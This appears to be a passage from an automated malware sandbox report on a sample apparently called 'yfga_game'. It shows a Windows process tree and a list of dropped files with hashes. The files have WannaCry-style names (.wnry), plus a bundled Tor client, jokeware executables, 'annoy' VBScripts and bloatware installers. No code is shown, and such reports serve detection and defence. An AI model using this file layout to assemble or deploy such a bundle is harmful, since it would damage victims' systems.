                                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B9771F520A628F09B412AA32FA4859C8 --mojo-platform-channel-handle=2476 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                          3⤵
                                                            PID:3376
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3768 -ip 3768
                                                        1⤵
                                                          PID:4980
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1548 -ip 1548
                                                          1⤵
                                                            PID:2736
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                                                            1⤵
                                                              PID:3768
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1548 -ip 1548
                                                              1⤵
                                                                PID:3864
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                1⤵
                                                                  PID:2456
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1548 -ip 1548
                                                                  1⤵
                                                                    PID:2536
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1548 -ip 1548
                                                                    1⤵
                                                                      PID:4356
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1548 -ip 1548
                                                                      1⤵
                                                                        PID:3176
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1548 -ip 1548
                                                                        1⤵
                                                                          PID:4212
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1548 -ip 1548
                                                                          1⤵
                                                                            PID:4048
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1548 -ip 1548
                                                                            1⤵
                                                                              PID:1200
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1548 -ip 1548
                                                                              1⤵
                                                                                PID:5296
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4980 -ip 4980
                                                                                1⤵
                                                                                  PID:5304
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1548 -ip 1548
                                                                                  1⤵
                                                                                    PID:2488
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1548 -ip 1548
                                                                                    1⤵
                                                                                      PID:5084
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1548 -ip 1548
                                                                                      1⤵
                                                                                        PID:1584
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1548 -ip 1548
                                                                                        1⤵
                                                                                          PID:3668
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1548 -ip 1548
                                                                                          1⤵
                                                                                            PID:2040
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1548 -ip 1548
                                                                                            1⤵
                                                                                              PID:2944
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1548 -ip 1548
                                                                                              1⤵
                                                                                                PID:5244
                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5472
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1548 -ip 1548
                                                                                                1⤵
                                                                                                  PID:5440
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1548 -ip 1548
                                                                                                  1⤵
                                                                                                    PID:5492
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1548 -ip 1548
                                                                                                    1⤵
                                                                                                      PID:5664
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1548 -ip 1548
                                                                                                      1⤵
                                                                                                        PID:5728
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1548 -ip 1548
                                                                                                        1⤵
                                                                                                          PID:5608
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1548 -ip 1548
                                                                                                          1⤵
                                                                                                            PID:5908
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1548 -ip 1548
                                                                                                            1⤵
                                                                                                              PID:6000
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1548 -ip 1548
                                                                                                              1⤵
                                                                                                                PID:6068
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1548 -ip 1548
                                                                                                                1⤵
                                                                                                                  PID:6096
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1548 -ip 1548
                                                                                                                  1⤵
                                                                                                                    PID:3116
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1548 -ip 1548
                                                                                                                    1⤵
                                                                                                                      PID:1488
                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa3938055 /state1:0x41c64e6d
                                                                                                                      1⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:5676

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                      Filesize

                                                                                                                      56KB

                                                                                                                      MD5

                                                                                                                      752a1f26b18748311b691c7d8fc20633

                                                                                                                      SHA1

                                                                                                                      c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                                                                                                      SHA256

                                                                                                                      111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                                                                                                      SHA512

                                                                                                                      a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      MD5

                                                                                                                      4e37a82cb128f73f560a0267555c3a03

                                                                                                                      SHA1

                                                                                                                      efdb996687d95ef1115840849ed9251c28b81699

                                                                                                                      SHA256

                                                                                                                      91181edba5b4fc5fc1efa1fb1ee13166ea0a0b0c19a6d6729e4b5c9027cb65c5

                                                                                                                      SHA512

                                                                                                                      02a96d5f9bd9a9cb5ff1405b72c7f39317b37f2fd819c69726717fe666d43fca6c636b0b36505fc685c9a3d1f03beb859328c324ec7aea9c1f68edad3912589c

                                                                                                                    • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.4232

                                                                                                                      Filesize

                                                                                                                      97KB

                                                                                                                      MD5

                                                                                                                      700e7d6f9cfc26cea4d04f65f02b3452

                                                                                                                      SHA1

                                                                                                                      e5580200e54edb7cd4f7c5daada5c031434cf334

                                                                                                                      SHA256

                                                                                                                      c3d8aef5d450a90e4a51335532c977515e589143be772697e666c8c9f4ab0c0e

                                                                                                                      SHA512

                                                                                                                      1cafa5bab9838052312d8a6ced7d9baa4f28ef77d48681ada4dedf29400d235b51e187a1f207cfd8e008ee6274156cb7ef2821fdf7cbcc65d697ff4f469d7a82

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Adobe_Flash_Player.exe

                                                                                                                      Filesize

                                                                                                                      114B

                                                                                                                      MD5

                                                                                                                      d725d85cc5f30c0f695b03a9e7d0c4c0

                                                                                                                      SHA1

                                                                                                                      131b68adcddb7ff3b3ce9c34c5277eb5d673f610

                                                                                                                      SHA256

                                                                                                                      4d4588c42fa8df0ea45ad48aca4511bb4286f0deaa41fdf188c3b7ab9e1b698a

                                                                                                                      SHA512

                                                                                                                      01f270a15aa10e60e14ac140ccb54e38cf8e57833ef1c0db7d36688a93ecdc0a59ecf9ead9366a5920faac7e28a2e0ee03759eb0fa92d455abc72f406fe8775b

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-QJ8GS.tmp\walliant.tmp

                                                                                                                      Filesize

                                                                                                                      2.5MB

                                                                                                                      MD5

                                                                                                                      62e5dbc52010c304c82ada0ac564eff9

                                                                                                                      SHA1

                                                                                                                      d911cb02fdaf79e7c35b863699d21ee7a0514116

                                                                                                                      SHA256

                                                                                                                      bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2

                                                                                                                      SHA512

                                                                                                                      b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946

                                                                                                                    • C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

                                                                                                                      Filesize

                                                                                                                      19.1MB

                                                                                                                      MD5

                                                                                                                      bbe837eca0ba286bd249a07f8a62fac4

                                                                                                                      SHA1

                                                                                                                      4c5a103500adac129d4349809dd99bd9dbb33503

                                                                                                                      SHA256

                                                                                                                      92703977a204848f1d623414368e8f9ba92b0eb7949216a81b0aa8836f789d53

                                                                                                                      SHA512

                                                                                                                      098ce15b3a02c76cf8d3c8abb3674a8681cbbe54885a8ee76b47ac1b0edf4ff92e28e52c0d0222d1c6ac77a42b3342cc6b8c62eebf744c297a86d0fed2239f9e

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\@[email protected]

                                                                                                                      Filesize

                                                                                                                      933B

                                                                                                                      MD5

                                                                                                                      7a2726bb6e6a79fb1d092b7f2b688af0

                                                                                                                      SHA1

                                                                                                                      b3effadce8b76aee8cd6ce2eccbb8701797468a2

                                                                                                                      SHA256

                                                                                                                      840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

                                                                                                                      SHA512

                                                                                                                      4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\@[email protected]

                                                                                                                      Filesize

                                                                                                                      240KB

                                                                                                                      MD5

                                                                                                                      7bf2b57f2a205768755c07f238fb32cc

                                                                                                                      SHA1

                                                                                                                      45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                      SHA256

                                                                                                                      b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                      SHA512

                                                                                                                      91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\AxInterop.ShockwaveFlashObjects.dll

                                                                                                                      Filesize

                                                                                                                      17KB

                                                                                                                      MD5

                                                                                                                      451112d955af4fe3c0d00f303d811d20

                                                                                                                      SHA1

                                                                                                                      1619c35078ba891091de6444099a69ef364e0c10

                                                                                                                      SHA256

                                                                                                                      0d57a706d4e10cca3aed49b341a651f29046f5ef1328878d616be93c3b4cbce9

                                                                                                                      SHA512

                                                                                                                      35357d2c4b8229ef9927fa37d85e22f3ae26606f577c4c4655b2126f0ecea4c69dae03043927207ca426cc3cd54fc3e72124369418932e04733a368c9316cf87

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\Interop.ShockwaveFlashObjects.dll

                                                                                                                      Filesize

                                                                                                                      21KB

                                                                                                                      MD5

                                                                                                                      e869d1d4545c212d9068a090a370ded3

                                                                                                                      SHA1

                                                                                                                      a6a92f108bba390cd14e7103ba710efec1d270f9

                                                                                                                      SHA256

                                                                                                                      63af704211a03f6ff6530ebfca095b6c97636ab66e5a6de80d167b19c3c30c66

                                                                                                                      SHA512

                                                                                                                      ee108b0ebefb476c5beb568129da7ce058229fb42ad3500c6fc37a36d718eb67a17b331d73f6920a5290c3977be2eda96aa057533c3344898d161cb464c6ef76

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\TaskData\Tor\tor.exe

                                                                                                                      Filesize

                                                                                                                      3.0MB

                                                                                                                      MD5

                                                                                                                      fe7eb54691ad6e6af77f8a9a0b6de26d

                                                                                                                      SHA1

                                                                                                                      53912d33bec3375153b7e4e68b78d66dab62671a

                                                                                                                      SHA256

                                                                                                                      e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                                                                                                                      SHA512

                                                                                                                      8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\YFGA.bat

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      ed0f2700c9451c8d00f43b8d2b30d3f0

                                                                                                                      SHA1

                                                                                                                      c0fd164172e817c831b4378086e23843cea5868b

                                                                                                                      SHA256

                                                                                                                      342539aee5e6c9f34e2a6c9f5e836c5765781b5678003b7f56a40eebcce00a2a

                                                                                                                      SHA512

                                                                                                                      29954cd24ba79170213576abf23f4e51ac63a48f92d1a019d1e0f77ce4deea449cb8cc84a418a32e4f63547d36464fd4c89b730e9085a679065de630dd16c61f

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\YouAreAnIdiot.exe

                                                                                                                      Filesize

                                                                                                                      424KB

                                                                                                                      MD5

                                                                                                                      e263c5b306480143855655233f76dc5a

                                                                                                                      SHA1

                                                                                                                      e7dcd6c23c72209ee5aa0890372de1ce52045815

                                                                                                                      SHA256

                                                                                                                      1f69810b8fe71e30a8738278adf09dd982f7de0ab9891d296ce7ea61b3fa4f69

                                                                                                                      SHA512

                                                                                                                      e95981eae02d0a8bf44493c64cca8b7e50023332e91d75164735a1d0e38138f358100c93633ff3a0652e1c12a5155cba77d81e01027422d7d5f71000eafb4113

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\annoy.vbs

                                                                                                                      Filesize

                                                                                                                      50B

                                                                                                                      MD5

                                                                                                                      3167d161336cbd296dc579d2295b0f22

                                                                                                                      SHA1

                                                                                                                      53253e5841e6a7a7a1b8bd08378af0a96b2f9a98

                                                                                                                      SHA256

                                                                                                                      307879bf0d9bec07bab240b5010434801fbee520c99c5a617e8ac630f42dde80

                                                                                                                      SHA512

                                                                                                                      62af8fa0c9a30ec6aa9b552fcac1879af1f00f5ceb48a77718b2a8e042e3524e2cd299f26fcde31ad8abf2dcb94d15cf45ecbce0bd5f9f93f44aca6327aa53ea

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\annoy2.vbs

                                                                                                                      Filesize

                                                                                                                      44B

                                                                                                                      MD5

                                                                                                                      9a2ccbd3e2f1a2382fed7674c28dd086

                                                                                                                      SHA1

                                                                                                                      b466bdd2079575c938de65285f02739143ecb170

                                                                                                                      SHA256

                                                                                                                      4519cd5997afce27129ef943f121972f7b0b34aa018e4dd408892fc5c39bb59e

                                                                                                                      SHA512

                                                                                                                      8929493211c17a8e99b908a8305dbebe2d96e1b54426e89ddba84c2010a86d7f6d0983080f29fa1ab7a0687d536c0546278b9fffe4560d84e4012f243f344d78

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\annoy3.vbs

                                                                                                                      Filesize

                                                                                                                      56B

                                                                                                                      MD5

                                                                                                                      19cf22e8d63e787913b6617542211e19

                                                                                                                      SHA1

                                                                                                                      8c3d2f43025e5c4ef70e0c4d1f36692361f51b1f

                                                                                                                      SHA256

                                                                                                                      dbec312d736f8a56f94ace99986d95d4355ef644a2fd908da1ff4c8b0a003979

                                                                                                                      SHA512

                                                                                                                      8b9d192dd7f175e63aebcdfc8426876fa8bf3ae00d3cf10bb8fcf0d0c262b906de28784f5b97141f656e87bb548d343b8d5a127c06ecb407289e91f3fc199608

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\b.wnry

                                                                                                                      Filesize

                                                                                                                      1.4MB

                                                                                                                      MD5

                                                                                                                      c17170262312f3be7027bc2ca825bf0c

                                                                                                                      SHA1

                                                                                                                      f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                      SHA256

                                                                                                                      d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                      SHA512

                                                                                                                      c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\bloatware\OperaSetup.exe

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      MD5

                                                                                                                      2d183522f195d563fe2a732363b8f757

                                                                                                                      SHA1

                                                                                                                      8b4ba6716e8e635b2b35ee64134784c788fa1b0e

                                                                                                                      SHA256

                                                                                                                      4b6d2615f53454076b996a91473287e5fc882ce266933cfbe815a63477ed8407

                                                                                                                      SHA512

                                                                                                                      2c37e38214ed90d21345a8675424cfe3086cce34acd19972081479946c541b747b97cc722910189f9b5e7e8bcd56de0b2326407b3008de6763c40366ceffc67b

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\bloatware\bewidgets.exe

                                                                                                                      Filesize

                                                                                                                      843KB

                                                                                                                      MD5

                                                                                                                      ff508ab78289efa35e67a05d6cc20717

                                                                                                                      SHA1

                                                                                                                      174f616661b53371fe93fa5cc4ec4b6e233abb43

                                                                                                                      SHA256

                                                                                                                      eca41ee73faaa7e85ecf4d4c6d4df0e078c36c6554f25142b5e68b2b6cf68272

                                                                                                                      SHA512

                                                                                                                      f94fd558e34589c8b0f3da7d20bbb404c4dc6e560aabc5f7e702cdf6a6b8a7870d63d8fb667f6324461ed37c32f6ff8abb0cee65317c6ad745e61c1fc7c80811

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\bloatware\bloatware.cmd

                                                                                                                      Filesize

                                                                                                                      140B

                                                                                                                      MD5

                                                                                                                      85960c66edf9a8db4e5a17d9f15b6ae3

                                                                                                                      SHA1

                                                                                                                      fb27f19a4e8f55dc2c77d7570d472e8df801531b

                                                                                                                      SHA256

                                                                                                                      81a20f21135c05252a3dd2042ff39bf044624c79f6d9ec9fd412a8c9b38d83a3

                                                                                                                      SHA512

                                                                                                                      c8b81cb4901039c5ac26bbf2e98b40db60bfd6ab37d7abbc030d1ba11f78485a148935539c09c2cb5c983f14d66b0fdd9d49c138a1340690b2aa69de35d4975f

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\bloatware\fontcreator.exe

                                                                                                                      Filesize

                                                                                                                      25.2MB

                                                                                                                      MD5

                                                                                                                      14cebb6187a53864094293d616e9af4d

                                                                                                                      SHA1

                                                                                                                      47b89d897f432002520fb4a9c0c862df45257d36

                                                                                                                      SHA256

                                                                                                                      1e3cf9b81993ca63c3da99c4ec29d8826d5ac65be4088b4e4fd52f11224be96c

                                                                                                                      SHA512

                                                                                                                      f4bc7cb3f602ac686485ee5b23a856b49ce3e3b73325cc520a728a723d014785f2091905f676312ee7826740f184b074458a31018d3c7d27a6ce2a219643195a

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\bloatware\iconchanger.exe

                                                                                                                      Filesize

                                                                                                                      1.1MB

                                                                                                                      MD5

                                                                                                                      3b89914c7bfe5487af38f7bd8dc31bb5

                                                                                                                      SHA1

                                                                                                                      7204cce974e02495f58731e961e4cdc49a2f1ef3

                                                                                                                      SHA256

                                                                                                                      14068d0948dfeedc5908573fcaa2704536faa8b0fbea8caac61b9fb264cc204d

                                                                                                                      SHA512

                                                                                                                      73735b965a0c948a4126bad31ea54fb4aa31b2c8877ab772f7596a27e821be9f6bba17ddbb9f4e87c6c70bba93375277008e4fa354bf1504e1cd2b9b190d45f8

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\bloatware\pixelsee.exe

                                                                                                                      Filesize

                                                                                                                      4.8MB

                                                                                                                      MD5

                                                                                                                      39490d6ae5b10a8cdffecd71d05141dd

                                                                                                                      SHA1

                                                                                                                      450da6260c6817aca8d9444831a48439ba45785c

                                                                                                                      SHA256

                                                                                                                      a9427d47bf1cfadd009990ca09feb2af88823f5908b17e2afa70c8c49c95b3eb

                                                                                                                      SHA512

                                                                                                                      7ffb9cb6a53cf233b6ff396eeb6193e683aed75001b3f73a1bbadaeec3ff7dcbce9b7e215d1743a4374e488185b824b90dde4afe93a8d93608b6340af07c14fb

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\bloatware\qtranslate.exe

                                                                                                                      Filesize

                                                                                                                      908KB

                                                                                                                      MD5

                                                                                                                      e23ffecb44c814aaa4708d56ab5b144b

                                                                                                                      SHA1

                                                                                                                      202311d615685e7baaa41dc149b5a76a69c05a0e

                                                                                                                      SHA256

                                                                                                                      d395af3c10e18c944cf8ade76a650623dc23e050eaf652ff31056c84077a013c

                                                                                                                      SHA512

                                                                                                                      4ae915fb4cb00e30a215ddd439c6e254fb49ce15c4d53000fb12a0cbf5f68820bc7dca6b840a620351060101c6995fd9429ea91f9682503f01ec001f213cfdc3

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\c.wnry

                                                                                                                      Filesize

                                                                                                                      780B

                                                                                                                      MD5

                                                                                                                      8124a611153cd3aceb85a7ac58eaa25d

                                                                                                                      SHA1

                                                                                                                      c1d5cd8774261d810dca9b6a8e478d01cd4995d6

                                                                                                                      SHA256

                                                                                                                      0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

                                                                                                                      SHA512

                                                                                                                      b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\calc.exe

                                                                                                                      Filesize

                                                                                                                      112KB

                                                                                                                      MD5

                                                                                                                      829e4805b0e12b383ee09abdc9e2dc3c

                                                                                                                      SHA1

                                                                                                                      5a272b7441328e09704b6d7eabdbd51b8858fde4

                                                                                                                      SHA256

                                                                                                                      37121ecb7c1e112b735bd21b0dfe3e526352ecb98c434c5f40e6a2a582380cdd

                                                                                                                      SHA512

                                                                                                                      356fe701e6788c9e4988ee5338c09170311c2013d6b72d7756b7ada5cda44114945f964668feb440d262fb1c0f9ca180549aafd532d169ceeadf435b9899c8f6

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\flasher.exe

                                                                                                                      Filesize

                                                                                                                      246KB

                                                                                                                      MD5

                                                                                                                      9254ca1da9ff8ad492ca5fa06ca181c6

                                                                                                                      SHA1

                                                                                                                      70fa62e6232eae52467d29cf1c1dacb8a7aeab90

                                                                                                                      SHA256

                                                                                                                      30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

                                                                                                                      SHA512

                                                                                                                      a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\hydra.cmd

                                                                                                                      Filesize

                                                                                                                      47B

                                                                                                                      MD5

                                                                                                                      5e578014c7017a85ca32f0b7e5d7df7f

                                                                                                                      SHA1

                                                                                                                      c88d8e7179fcc070d4419be9f4d8647354c2f6ed

                                                                                                                      SHA256

                                                                                                                      a964a717e3c47cb7d274e98928ca1271377d0d76a8908448e1b70e63af4082ad

                                                                                                                      SHA512

                                                                                                                      7eb206b0cbc2a9b744246d8a83b2fccc70204c6e777b0fcbb838e63d477fe047d8827f3c0de823d55b9ab5cba2ab572ff3f543f76a3451fa81b31584cc767106

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\jokewarehydra.exe

                                                                                                                      Filesize

                                                                                                                      43KB

                                                                                                                      MD5

                                                                                                                      b2eca909a91e1946457a0b36eaf90930

                                                                                                                      SHA1

                                                                                                                      3200c4e4d0d4ece2b2aadb6939be59b91954bcfa

                                                                                                                      SHA256

                                                                                                                      0b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c

                                                                                                                      SHA512

                                                                                                                      607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_bulgarian.wnry

                                                                                                                      Filesize

                                                                                                                      46KB

                                                                                                                      MD5

                                                                                                                      95673b0f968c0f55b32204361940d184

                                                                                                                      SHA1

                                                                                                                      81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                                                      SHA256

                                                                                                                      40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                                                      SHA512

                                                                                                                      7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_chinese (simplified).wnry

                                                                                                                      Filesize

                                                                                                                      53KB

                                                                                                                      MD5

                                                                                                                      0252d45ca21c8e43c9742285c48e91ad

                                                                                                                      SHA1

                                                                                                                      5c14551d2736eef3a1c1970cc492206e531703c1

                                                                                                                      SHA256

                                                                                                                      845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                                                                                                      SHA512

                                                                                                                      1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_chinese (traditional).wnry

                                                                                                                      Filesize

                                                                                                                      77KB

                                                                                                                      MD5

                                                                                                                      2efc3690d67cd073a9406a25005f7cea

                                                                                                                      SHA1

